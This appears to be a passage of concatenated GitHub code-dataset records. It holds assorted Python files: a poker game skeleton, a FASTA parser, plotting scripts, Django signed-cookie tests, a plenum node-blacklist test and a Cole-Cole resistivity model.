add==c\nn=145\nif strong(n,c):\n print('strong')\nelse:\n print('not strong')\n","repo_name":"Shashivardhan3/python_1","sub_path":"fn stronng number.py","file_name":"fn stronng number.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19770465167","text":"from enum import Enum \n#import numpy as np\n\nclass Suit(Enum):\n HEART = 1\n SPADE = 2\n DIAMOND = 3\n CLUB = 4\n\nclass Rank(Enum):\n ONE = 1,\n TWO = 2,\n THREE = 3,\n FOUR = 4,\n FIVE = 5,\n SIX = 6,\n SEVEN = 7,\n EIGHT = 8\n NINE = 9,\n TEN = 10,\n JACK = 11\n QUEEN = 12\n KING = 13\n ACE = 14\n\nclass TopRowRoyalty(Enum):\n PAIR66 = 1\n PAIR77 = 2\n PAIR88 = 3\n PAIR99 = 4\n PAIRTT = 5\n PAIRJJ = 6\n PAIRQQ = 7\n PAIRKK = 8\n PAIRAA = 9\n SET222 = 10\n SET333 = 11\n SET444 = 12\n SET555 = 13\n SET666 = 14\n SET777 = 15\n SET888 = 16\n SET999 = 17\n SETTTT = 18\n SETQQQ = 20\n SETKKK = 21\n SETAAA = 22\n \nclass MiddleRowRoyalty(Enum):\n TRIPS = 2\n STRAIGHT = 4\n FLUSH = 8\n FULLHOUSE = 12\n QUADS = 20\n STRAIGHTFLUSH = 30\n ROYALFLUSH = 50\n\nclass BottomRowRoyalty(Enum):\n STRAIGHT = 4\n FLUSH = 4\n FULLHOUSE = 6\n QUADS = 10\n STRAIGHTFLUSH = 15\n ROYALFLUSH = 25\n\n\nclass Card:\n def __init__(self, Suit, Rank):\n self.suit = Suit.name\n self.rank = Rank.name\n print(self.suit + \" \" + self.rank)\n\n#need to initialize\n#draw, shuffle\nclass Deck:\n def __init__(self):\n self.cards = []\n\n def shuffle(self):\n for suit in list(Suit):\n print(suit)\n for rank in list(Rank):\n new_card = Card(suit, rank)\n self.cards.append(new_card)\n\n\nclass Hand:\n def __init__(self):\n self.cards = []\n \n #def draw(self):\n\n\nclass Board:\n def __init__(self):\n #board is 2x5 and 1x3, treated as 3x5 for now\n #self.cards = [[0]*5]*3\n self.top_row = [0]*3\n self.middle_row = [0]*5\n self.bottom_row = [0]*5\n \n def calculate_value(self):\n return 0 \n\n \n\nclass Player:\n def __init__(self, name):\n self.name = name\n self.board = Board()\n self.hand = Hand()\n self.points = 0\n\n \n\nclass Game:\n def __init__(self):\n self.deck = Deck()\n self.deck.shuffle()\n\n #game can have two or three players\n #input here should come externally?\n player_one = Player(\"Joe\")\n player_two = Player(\"Steve\")\n self.players = []\n self.players.append(player_one)\n self.players.append(player_two)\n\n #players place cards for the round\n #move into separate test file eventually\n \n #print_board(players)\n\n def deal(self):\n counter = 0\n for i in range(5):\n for player in self.players:\n player.hand.cards.append(self.deck.cards[counter])\n counter += 1 \n\n def print_board(self):\n for player in self.players:\n print(\"player hand: \" + player.name)\n for card in player.hand.cards:\n print(\"card: \" + card.suit)\n print(\"rank: \" + card.rank)\n\n print(\"player board: \")\n print(\"top row\")\n for card in player.board.top_row:\n self.print_card(card)\n \n print(\"middle row\")\n for card in player.board.middle_row:\n self.print_card(card)\n \n print(\"bottom row\")\n for card in player.board.bottom_row:\n self.print_card(card)\n\n def print_card(self, card):\n if(type(card) == int):\n print(\"no card\")\n else: \n print(\"card: \" + card.rank + \" \" +card.suit)\n #print(\"rank: \" + card.rank)\n \n #player number, range from 0-2, 0-3, need to add something for row management\n #card_index is of range 0-4, reduces by one for each card played\n #player can only play \n def play_card(self, player_number, card_index, col):\n print(self.players[player_number].hand.cards)\n self.players[player_number].board.top_row[col] = self.players[player_number].hand.cards.pop(card_index) \n\n \ngame = Game()\n\ngame.deal()\n\ngame.print_board()\n \ngame.play_card(1, 1, 1)\n\ngame.print_board()\n\ngame.play_card(2, 2, 2)\n\n\n#def deal(hands deck)\n\n\n\n#Each player has a hand and a board\n#class Player:\n\n \n# print(type(Suit.HEART.name))\n\n# print(list(Suit))\n\n# print(list(Rank))\n\n# woof = Card(Suit.HEART, Rank.ACE)\n\n# print(\"woof\" + woof.rank)\n\n# print(\"woof2\" + woof.suit)\n\n# woofwoof = Deck()\n\n# woofwoof.shuffle()\n\n# for card in woofwoof.cards:\n# print(\"suit \" + card.suit + \" rank \" + card.rank)\n\n#print(list(woofwoof.cards))","repo_name":"vigjo/ofc-poker","sub_path":"src/ofc.py","file_name":"ofc.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30502408538","text":"import hashlib\nimport itertools\nimport os\nimport re\nimport types\n\nIDTYPES = set(\"dbj emb gb gi ref pir prf sp pdb pat bbs lcl gnl sha1\".split())\n\ndef parse(data, stream=False):\n if isinstance(data, types.StringTypes):\n reader = Reader.fromstring(data)\n else:\n reader = Reader(iter(data))\n while True:\n yield Record(reader, stream=stream) \n\ndef parse_file(path):\n with open(path) as handle:\n for rec in parse(handle):\n yield rec\n\nclass Record(object):\n def __init__(self, handle, stream=False):\n hdr = handle.nextheader()\n self.meta = Record.parse_defline(hdr)\n if not stream:\n hstr = HashStream(handle)\n self.sequence = ''.join(hstr)\n self.hash = hstr.hash()\n else:\n self.seqiter = HashStream(handle)\n self.hash = property(lambda self: self.seq.hash())\n\n @property\n def id(self):\n \"Primary identifier for this record.\"\n return self.meta[\"ids\"][0]\n \n @property\n def desc(self):\n \"Primery description of this record.\"\n return self.meta[\"desc\"][0]\n\n @staticmethod\n def parse_defline(data):\n if data[:1] != \">\":\n raise ValueError(\"Invalid header has no '>': %s\" % header)\n headers = data[1:].split('\\x01')\n ret = {\"ids\": [], \"desc\": []}\n for h in headers:\n bits = h.split(None, 1)\n ident, desc = bits[0], None\n if len(bits) > 1:\n desc = bits[1].strip()\n for sid in Record.parse_id(ident):\n if sid not in ret[\"ids\"]:\n ret[\"ids\"].append(sid)\n if desc not in ret[\"desc\"]:\n ret[\"desc\"].append(desc)\n return ret\n \n @staticmethod\n def parse_id(data):\n if data.find(\"|\") < 0: return [data]\n bits = data.split(\"|\")\n ret = []\n while len(bits):\n idtype = bits.pop(0)\n curr = []\n while len(bits) and bits[0] not in IDTYPES:\n curr.append(bits.pop(0))\n ret.append((idtype, '|'.join(filter(None, curr))))\n return ret\n\nclass Reader(object):\n def __init__(self, stream):\n self.stream = itertools.ifilter(Reader.skipblank, stream)\n self.header = None\n\n def __iter__(self):\n return self\n\n @staticmethod\n def skipblank(line):\n return bool(line.strip())\n \n @staticmethod\n def from_string(strdata):\n def _ter(data):\n prev = 0\n next = data.find(\"\\n\")\n while next >= 0:\n yield data[prev:next]\n prev, next = next, data.find(\"\\n\", next+1)\n yield data[prev:]\n return Reader(_iter(strdata))\n\n def nextheader(self):\n if self.header is not None:\n ret, self.header = self.header, None\n return ret\n line = self.stream.next().lstrip()\n if not line[:1] == \">\":\n raise ValueError(\"Invalid definition line: %s\" % line)\n return line\n\n def next(self):\n if self.header:\n raise StopIteration\n line = self.stream.next().lstrip()\n if line[:1] == \">\":\n self.header = line\n raise StopIteration\n return line\n\nclass HashStream(object):\n def __init__(self, stream):\n self.stream = stream\n self.sha = hashlib.sha1()\n self.exhausted = False\n \n def __iter__(self):\n return self\n \n def next(self):\n if self.exhausted:\n raise StopIteration\n try:\n data = self.stream.next().strip()\n except StopIteration:\n self.exhausted = True\n raise\n self.sha.update(data)\n return data\n \n def hash(self):\n return self.sha.hexdigest().upper()\n\n\n","repo_name":"ekspiulo/nebfa","sub_path":"nebfa.py","file_name":"nebfa.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6250175628","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import MultipleLocator\nimport math\n\nwith open(\"./settings.txt\", \"r\") as settings_file:\n settings_data = [float(num) for num in settings_file.read().split(\"\\n\")]\n\ndata_arr = np.loadtxt(\"./data.txt\", dtype=int)\n\nvolt_step = settings_data[1]\ntime_step = settings_data[0]\n\nvolt_arr = data_arr * volt_step\ntime_arr = np.arange(0, len(data_arr)) * time_step\n\nvolt_max = np.max(volt_arr)\nvolt_max_ind = np.argmax(volt_arr)\ntime_max = np.max(time_arr)\ntime_max_ind = np.argmax(time_arr)\n\ncharge_data = [time_arr[0:volt_max_ind:], volt_arr[0:volt_max_ind:]]\ndischarge_data = [time_arr[volt_max_ind::], volt_arr[volt_max_ind::]]\n\nfigure, axes = plt.subplots(figsize = (16, 10), dpi = 400)\n\naxes.set_xlabel(\"Time, s\", fontsize = 16)\naxes.set_ylabel(\"Voltage, V\", fontsize = 16)\naxes.set_title(\"Capacitor charge-discharge graph in RC-circuit\", fontsize = 20)\n\ncharge_plot_line , = axes.plot(charge_data[0], charge_data[1], color = 'blue')\ndischarge_plot_line, = axes.plot(discharge_data[0], discharge_data[1], color = 'red')\n\ncharge_plot_line.set_label(\"Capacitor charge\")\ndischarge_plot_line.set_label(\"Capacitor discharge\")\naxes.legend(prop={\"size\":16})\n\nx_limits = (0.0, math.ceil(time_max))\ny_limits = (0.0, 3.5)\naxes.set(xlim = x_limits, ylim = y_limits)\n\naxes.xaxis.set_minor_locator(MultipleLocator(0.5))\naxes.xaxis.set_major_locator(MultipleLocator(1.0))\naxes.yaxis.set_minor_locator(MultipleLocator(0.25))\naxes.yaxis.set_major_locator(MultipleLocator(0.5))\naxes.grid(color = \"blue\", which = \"both\", linestyle = ':', linewidth = 0.5)\n\ncharge_time = time_arr[volt_max_ind] - time_arr[0]\ndischarge_time = time_arr[-1] - time_arr[volt_max_ind]\n\naxes.axvline(x = charge_time, ymin=y_limits[0], ymax = volt_max/y_limits[1], color = 'green', linestyle='dashed')\naxes.axhline(y = volt_max, xmin=x_limits[0], xmax = charge_time/x_limits[1], color = 'green', linestyle='dashed')\n\naxes.scatter(time_arr[volt_max_ind], volt_max, color='green')\n\naxes.scatter(x = charge_time, y = 0.0, color='green')\naxes.text(x=charge_time+0.1, y = 0.05, s=str(round(charge_time, 2)), fontsize = 12)\n\naxes.scatter(x = 0.0, y = volt_max, color = 'green')\naxes.text(x = 0.1, y = volt_max+0.05, s = str(round(volt_max, 2)), fontsize = 12)\n\naxes.text(x = (charge_time/2-0.8), y = volt_max/2, s = (\"Charge time: \" + str(round(charge_time, 2)) + \" s\"), color = 'blue', fontsize = 14)\naxes.text(x = (charge_time+discharge_time/2-0.8), y = volt_max/2, s = (\"Discharge time: \" + str(round(discharge_time, 2)) + \" s\"), color = 'red', fontsize = 14)\n\nfigure.savefig(\"graph.svg\")\n","repo_name":"Vladislave0-0/MIPT-engineering-training-courses","sub_path":"8#Data processing and plotting in Python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14750581010","text":"import pytest\n\nfrom stp_core.loop.eventually import eventually\nfrom plenum.common.messages.node_messages import Nomination\nfrom plenum.test import waits\n\nwhitelist = ['already got nomination',\n 'doing nothing for now']\n\n\n# noinspection PyIncorrectDocstring,PyUnusedLocal,PyShadowingNames\n@pytest.mark.skip(reason=\"SOV-540. Implementation changed.\")\ndef testBlacklistNodeOnMultipleNominations(looper, txnPoolNodeSet, ready):\n \"\"\"\n A node that sends multiple nominations must be blacklisted by other nodes\n \"\"\"\n A, B, C, D = txnPoolNodeSet\n\n # B sends more than 2 nominations\n for i in range(3):\n B.send(Nomination(D.name, 0, B.viewNo))\n\n # B should be blacklisted by A, C, D\n def chk():\n for node in A, C, D:\n assert node.isNodeBlacklisted(B.name)\n\n timeout = waits.expectedPoolNominationTimeout(len(txnPoolNodeSet))\n looper.run(eventually(chk, retryWait=1, timeout=timeout))\n","repo_name":"scipsycho/MADBTC","sub_path":"Indy/indy-plenum/plenum/test/blacklist/test_blacklist_node_on_multiple_nominations.py","file_name":"test_blacklist_node_on_multiple_nominations.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6307569465","text":"from datetime import timedelta\n\nfrom django.core import signing\nfrom django.http import HttpRequest, HttpResponse\nfrom django.test import SimpleTestCase, override_settings\nfrom django.test.utils import freeze_time\n\n\nclass SignedCookieTest(SimpleTestCase):\n def test_can_set_and_read_signed_cookies(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n self.assertIn(\"c\", response.cookies)\n self.assertTrue(response.cookies[\"c\"].value.startswith(\"hello:\"))\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value\n value = request.get_signed_cookie(\"c\")\n self.assertEqual(value, \"hello\")\n\n def test_can_use_salt(self):\n response = HttpResponse()\n response.set_signed_cookie(\"a\", \"hello\", salt=\"one\")\n request = HttpRequest()\n request.COOKIES[\"a\"] = response.cookies[\"a\"].value\n value = request.get_signed_cookie(\"a\", salt=\"one\")\n self.assertEqual(value, \"hello\")\n with self.assertRaises(signing.BadSignature):\n request.get_signed_cookie(\"a\", salt=\"two\")\n\n def test_detects_tampering(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value[:-2] + \"$$\"\n with self.assertRaises(signing.BadSignature):\n request.get_signed_cookie(\"c\")\n\n def test_default_argument_suppresses_exceptions(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value[:-2] + \"$$\"\n self.assertIsNone(request.get_signed_cookie(\"c\", default=None))\n\n def test_max_age_argument(self):\n value = \"hello\"\n with freeze_time(123456789):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", value)\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value\n self.assertEqual(request.get_signed_cookie(\"c\"), value)\n\n with freeze_time(123456800):\n self.assertEqual(request.get_signed_cookie(\"c\", max_age=12), value)\n self.assertEqual(request.get_signed_cookie(\"c\", max_age=11), value)\n self.assertEqual(\n request.get_signed_cookie(\"c\", max_age=timedelta(seconds=11)), value\n )\n with self.assertRaises(signing.SignatureExpired):\n request.get_signed_cookie(\"c\", max_age=10)\n with self.assertRaises(signing.SignatureExpired):\n request.get_signed_cookie(\"c\", max_age=timedelta(seconds=10))\n\n def test_set_signed_cookie_max_age_argument(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"value\", max_age=100)\n self.assertEqual(response.cookies[\"c\"][\"max-age\"], 100)\n response.set_signed_cookie(\"d\", \"value\", max_age=timedelta(hours=2))\n self.assertEqual(response.cookies[\"d\"][\"max-age\"], 7200)\n\n @override_settings(SECRET_KEY=b\"\\xe7\")\n def test_signed_cookies_with_binary_key(self):\n response = HttpResponse()\n response.set_signed_cookie(\"c\", \"hello\")\n\n request = HttpRequest()\n request.COOKIES[\"c\"] = response.cookies[\"c\"].value\n self.assertEqual(request.get_signed_cookie(\"c\"), \"hello\")\n","repo_name":"django/django","sub_path":"tests/signed_cookies_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"6048296353","text":"# Colors:\r\nRED = [1., 0., 0.]\r\nGREEN = [0., 1., 0.]\r\nBLUE = [0., 0., 1.]\r\nYELLOW = [1., 1., 0.]\r\nMAGENTA = [1., 0., 1.]\r\nCYAN = [0., 1., 1.]\r\n\r\npositions = [x_max, y_max, z_max, x_min, y_min, z_min]\r\ncolors = [RED, GREEN, BLUE, MAGENTA, YELLOW, CYAN]\r\nfor i in range(len(positions)):\r\n # Create a sphere mesh:\r\n sphere = o3d.geometry.TriangleMesh.create_sphere(radius=0.05)\r\n # move to the point position:\r\n sphere.translate(np.asarray(positions[i]))\r\n # add color:\r\n sphere.paint_uniform_color(np.asarray(colors[i]))\r\n # compute normals for vertices or faces:\r\n sphere.compute_vertex_normals()\r\n # add to geometry list to display later:\r\n geometries.append(sphere)\r\n\r\n# Display:\r\no3d.visualization.draw_geometries(geometries)","repo_name":"enesgokdemir/visualize-point-clouds","sub_path":"draw_spheres.py","file_name":"draw_spheres.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"36465264375","text":"#\n# * Intro 54, Sum Up Numbers\n# * Medium\n\n# * CodeMaster has just returned from shopping. He scanned the check of the items \n# * he bought and gave the resulting string to Ratiorg to figure out the total \n# * number of purchased items. Since Ratiorg is a bot he is definitely going to \n# * automate it, so he needs a program that sums up all the numbers which appear \n# * in the given input.\n\n# Help Ratiorg by writing a function that returns the sum of numbers that appear \n# in the given inputString.\n\n# * Example\n\n# For inputString = \"2 apples, 12 oranges\", the output should be\n# sumUpNumbers(inputString) = 14.\n\n# * Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string inputString\n\n# Guaranteed constraints:\n# 0 ≤ inputString.length ≤ 105.\n\n# [output] integer\n\n\n#%%\n\n# * Solution 1\nimport re\ndef sumUpNumbers(inputString: str)-> int:\n findings = re.findall('\\d+', inputString)\n print(findings)\n return sum([int(x) for x in findings])\n\n\n\na1 = '2 apples, 12 oranges'\ne1 = 12\nr1 = sumUpNumbers(a1)\nprint('For {}, expected: {}, result:{}'.format(a1, e1, r1))\n\n\n# %%\n","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Intro/Intro54SumUpNumbers.py","file_name":"Intro54SumUpNumbers.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17113514670","text":"'''\nAuthor: Alex Reichenbach\nDate: May 7, 2022\n'''\nimport cv2\nimport numpy as np\n\nfrom usac.filters.filter import Filter\nfrom usac.data.rgbd_image import RGBD_Image\n\nclass NormalFilter(Filter):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def _filter_image(self, rgbd: RGBD_Image) -> np.ndarray:\n '''\n r, c = i, j are origin \n\n 0) Left, (r, c - 1)\n 1) Left up, (r - 1, c - 1)\n 2) Up, (r - 1, c)\n 3) Up right, (r - 1, c + 1)\n 4) Right, (r, c + 1)\n 5) Right Down, (r + 1, c + 1)\n 6) Down, (r + 1, c)\n 7) Down Left, (r + 1, c - 1)\n '''\n rows, cols = rgbd.depth.shape\n\n # zx = cv2.Sobel(rgbd.depth, cv2.CV_64F, 1, 0, ksize=5) \n # zy = cv2.Sobel(rgbd.depth, cv2.CV_64F, 0, 1, ksize=5)\n\n zx, zy = np.gradient(rgbd.depth)\n\n zx = zx.clip(-self.cfg.max_grad, self.cfg.max_grad)\n zy = zy.clip(-self.cfg.max_grad, self.cfg.max_grad)\n\n zx -= zx.min()\n zy -= zy.min()\n zx /= zx.max()\n zy /= zy.max()\n\n\n return np.stack([zx, zy])\n","repo_name":"Reichenbachian/UnsupervisedSegmentation","sub_path":"usac/filters/normals.py","file_name":"normals.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70580911147","text":"# *-* coding: utf-8 *-*\n\"\"\" Cole-Cole model (resistivity/resistance formulation) after Pelton et al.\n1978\n\nPelton, W., Ward, S., Hallof, P., Sill, W., and Nelson, P. (1978). Mineral\ndiscrimination and removal of inductive coupling with multifrequency ip.\nGeophysics, 43(3):588–609.\n\"\"\"\nimport numpy as np\nimport sip_models.sip_response as sip_response\n\n\ndef _make_list(number_or_list):\n # return the object enclosed in a list if its not a tuple or list\n if isinstance(number_or_list, (tuple, list)):\n return number_or_list\n else:\n return [number_or_list, ]\n\n\nclass cc_base(object):\n \"\"\" Base class for Cole-Cole objects (both resistivity and conductivity)\n \"\"\"\n def __init__(self, frequencies):\n self.f = frequencies\n\n def _sort_parameters(self, parameters):\n # type 1\n if isinstance(parameters, (list, tuple, np.ndarray)):\n pars = np.atleast_1d(parameters)\n nr_pars = int((pars.shape[0] - 1) / 3)\n\n rho0 = pars[0]\n m = pars[1:nr_pars + 1]\n tau = pars[nr_pars + 1: 2 * nr_pars + 1]\n c = pars[2 * nr_pars + 1:]\n\n elif isinstance(parameters, dict):\n rho0 = parameters['rho0']\n m = _make_list(parameters['m'])\n tau = _make_list(parameters['tau'])\n c = _make_list(parameters['c'])\n else:\n print(parameters)\n raise Exception('Input format not recognized')\n\n return rho0, m, tau, c\n\n def _set_parameters(self, parameters):\n \"\"\"Sort out the various possible parameter inputs and return a config\n object (dict)\n\n We have multiple input formats:\n\n 1) a list, tuple, or numpy.ndarray, containing the linear parameters\n in the following order:\n * for single term: rho0, m1, tau1, c1\n * for multiple termss: rho0, m1, m2, ..., tau1, tau2, ..., c1, c2, ...\n\n 2) a dictionary with the entries \"rho0\", \"m\", \"tau\", \"c\"\n\n 2b) if the dictionary entries for \"m\", \"tau\", and \"c\" are lists, the\n entries correspond to mulitple polarisazion terms\n\n \"\"\"\n nr_f = self.f.size\n\n # sort out parameters\n rho0, m, tau, c = self._sort_parameters(parameters)\n\n newsize = (nr_f, len(m))\n # rho0_resized = np.resize(rho0, newsize)\n m_resized = np.resize(m, newsize)\n tau_resized = np.resize(tau, newsize)\n c_resized = np.resize(c, newsize)\n\n omega = np.atleast_2d(2 * np.pi * self.f).T\n self.w = np.resize(omega, (len(m), nr_f)).T\n self.rho0 = rho0\n self.m = m_resized\n self.tau = tau_resized\n self.c = c_resized\n\n # compute some common terms\n self.otc = (self.w * self.tau) ** self.c\n self.otc2 = (self.w * self.tau) ** (2 * self.c)\n self.ang = self.c * np.pi / 2.0 # rad\n self.denom = 1 + 2 * self.otc * np.cos(self.ang) + self.otc2\n\n\nclass cc(cc_base):\n\n def response(self, parameters):\n r\"\"\"Complex response of the Cole-Cole model::\n :math:`\\hat{\\rho} = \\rho_0 \\left(1 - \\sum_i m_i (1 - \\frac{1}{1 + (j\n \\omega \\tau_i)^c_i})\\right)`\n\n Parameters\n ----------\n parameters: list or tuple or numpy.ndarray\n Cole-Cole model parameters: rho0, m, tau, c (all linear)\n\n Returns\n -------\n response: :class:`sip_models.sip_response.sip_response`\n model response object\n \"\"\"\n # get a config object\n self._set_parameters(parameters)\n terms = self.m * (1 - (1 / (1 + (1j * self.w * self.tau) ** self.c)))\n # sum up terms\n specs = np.sum(terms, axis=1)\n rcomplex = self.rho0 * (1 - specs)\n response = sip_response.sip_response(self.f, rcomplex=rcomplex)\n\n return response\n\n def dre_drho0(self, pars):\n r\"\"\" Compute partial derivative of real parts with respect to\n :math:`\\rho_0`\n\n :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial \\rho_0} = 1 -\n \\frac{m (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^c}{1 + 2\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n\n Note that partial derivatives towards :math:`\\rho_0` are 1D, in\n contrast to the other parameter derivatives, which usually return 2D\n arrays!\n\n Returns\n -------\n dre_drho0: :class:`numpy.ndarray`\n Size N (nr of frequencies) array with the derivatives\n\n \"\"\"\n self._set_parameters(pars)\n numerator = self.m * self.otc * (np.cos(self.ang) + self.otc)\n term = numerator / self.denom\n specs = np.sum(term, axis=1)\n\n result = 1 - specs\n return result\n\n def dre_dlog10rho0(self, pars):\n \"\"\"Compute partial derivative of real parts to log10(rho0)\n \"\"\"\n\n # first call the linear response to set the parameters\n linear_response = self.dre_drho0(pars)\n result = np.log(10) * self.rho0 * linear_response\n return result\n\n def dre_dm(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial m} = - \\rho_0 m\n (\\omega \\tau)^c \\frac{(cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^c)}{1 + 2\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n \"\"\"\n self._set_parameters(pars)\n numerator = -self.otc * (np.cos(self.ang) + self.otc)\n result = numerator / self.denom\n result *= self.rho0\n return result\n\n def dre_dlog10m(self, pars):\n lin_response = self.dre_dm(pars)\n result = np.log(10) * self.m * lin_response\n return result\n\n def dre_dtau(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial \\tau} = \\rho_0\n \\frac{-m \\omega^c c \\tau^{c-1} cos(\\frac{c \\pi}{2} - m \\omega^{2 c} 2 c\n \\tau^{2c - 1}}{1 + 2 (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega\n \\tau)^{2 c}} +\n \\rho_0 \\frac{\\left[m (\\omega \\tau)^c (cos(\\frac{c \\pi}{2}) + (\\omega\n \\tau)^c) \\right] \\cdot \\left[ 2 \\omega^c c \\tau^{c-1} cos(\\frac{c\n \\pi}{2}) + 2 c \\omega^{2 c} \\tau^{2 c - 1}\\right]}{\\left[1 + 2 (\\omega\n \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n \"\"\"\n self._set_parameters(pars)\n # term1\n nom1 = - self.m * self.c * self.w ** self.c * self.tau ** \\\n (self.c - 1) *\\\n np.cos(self.ang) - self.m * self.w ** (2 * self.c) *\\\n 2 * self.c * self.tau ** (2 * self.c - 1)\n term1 = nom1 / self.denom\n\n # term2\n nom2 = self.m * self.otc * (np.cos(self.ang) + self.otc) *\\\n (2 * self.w ** self.c * self.c * self.tau ** (self.c - 1) *\n np.cos(self.ang) + 2 * self.c * self.w ** (2 * self.c) *\n self.tau ** (2 * self.c - 1))\n term2 = nom2 / self.denom ** 2\n\n result = term1 + term2\n result *= self.rho0\n return result\n\n def dre_dlog10tau(self, pars):\n lin_response = self.dre_dtau(pars)\n result = np.log(10) * self.tau * lin_response\n return result\n\n def dre_dc(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho'}(\\omega)}{\\partial c} = \\rho_0\n \\frac{-m ln(\\omega \\tau) (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + m\n (\\omega\\tau)^c \\frac{\\pi}{2} sin(\\frac{c \\pi}{2}) + ln(\\omega\n \\tau)(\\omega \\tau)^c}{1 + 2 (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) +\n (\\omega \\tau)^{2 c}} +\n \\rho_0 \\frac{\\left[-m (\\omega \\tau)^c (cos(\\frac{c \\pi}{2}) + (\\omega\n \\tau)^c) \\right] \\cdot \\left[ -2 ln(\\omega \\tau) (\\omega \\tau)^c\n cos(\\frac{c \\pi}{2}) + 2 (\\omega \\tau)^c \\frac{\\pi}{2} cos(\\frac{c\n \\pi}{2} + 2 ln(\\omega \\tau) (\\omega \\tau)^{2 c}\\right]}{\\left[1 + 2\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n \"\"\"\n self._set_parameters(pars)\n # term1\n nom1 = - self.m * np.log(self.w * self.tau) * self.otc *\\\n np.cos(self.ang) +\\\n self.m * self.otc * (np.pi / 2.0) *\\\n np.sin(self.ang) -\\\n 2 * self.m * np.log(self.w * self.tau) *\\\n self.otc2\n term1 = nom1 / self.denom\n\n # term2\n nom2 = (self.m * self.otc * (np.cos(self.ang) + self.otc)) *\\\n (2 * np.log(self.w * self.tau) * self.otc * np.cos(self.ang) -\n 2 * self.otc * (np.pi / 2.0) * np.sin(self.ang) +\n 2 * np.log(self.w * self.tau) * self.otc2)\n term2 = nom2 / self.denom ** 2\n\n result = term1 + term2\n result *= self.rho0\n return result\n\n def dim_drho0(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho}''(\\omega)}{\\partial \\rho_0} = -\n \\frac{m (\\omega \\tau)^c sin(\\frac{c \\pi}{2})}{1 + 2\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n \"\"\"\n self._set_parameters(pars)\n\n result = np.sum(- self.m * self.otc * np.sin(self.ang) / self.denom,\n axis=1)\n\n return result\n\n def dim_dlog10rho0(self, pars):\n lin_resp = self.dim_drho0(pars)\n result = np.log(10) * self.rho0 * lin_resp\n return result\n\n def dim_dm(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho''}(\\omega)}{\\partial m} = - \\rho_0 m\n (\\omega \\tau)^c \\frac{sin(\\frac{c \\pi}{2})}{1 + 2 (\\omega \\tau)^c\n cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}}`\n \"\"\"\n self._set_parameters(pars)\n numerator = -self.otc * np.sin(self.ang)\n result = numerator / self.denom\n result *= self.rho0\n return result\n\n def dim_dlog10m(self, pars):\n lin_response = self.dim_dm(pars)\n result = np.log(10) * self.m * lin_response\n return result\n\n def dim_dtau(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho''}(\\omega)}{\\partial \\tau} = \\rho_0\n \\frac{-m \\omega^c c \\tau^{c-1} sin(\\frac{c \\pi}{2} }{1 + 2 (\\omega\n \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}} +\n \\rho_0 \\frac{\\left[-m (\\omega \\tau)^c sin(\\frac{c \\pi}{2}\n \\right] \\cdot \\left[ 2 \\omega^c c \\tau^{c-1} cos(\\frac{c\n \\pi}{2}) + 2 c \\omega^{2 c} \\tau^{2 c - 1}\\right]}{\\left[1 + 2 (\\omega\n \\tau)^c cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n 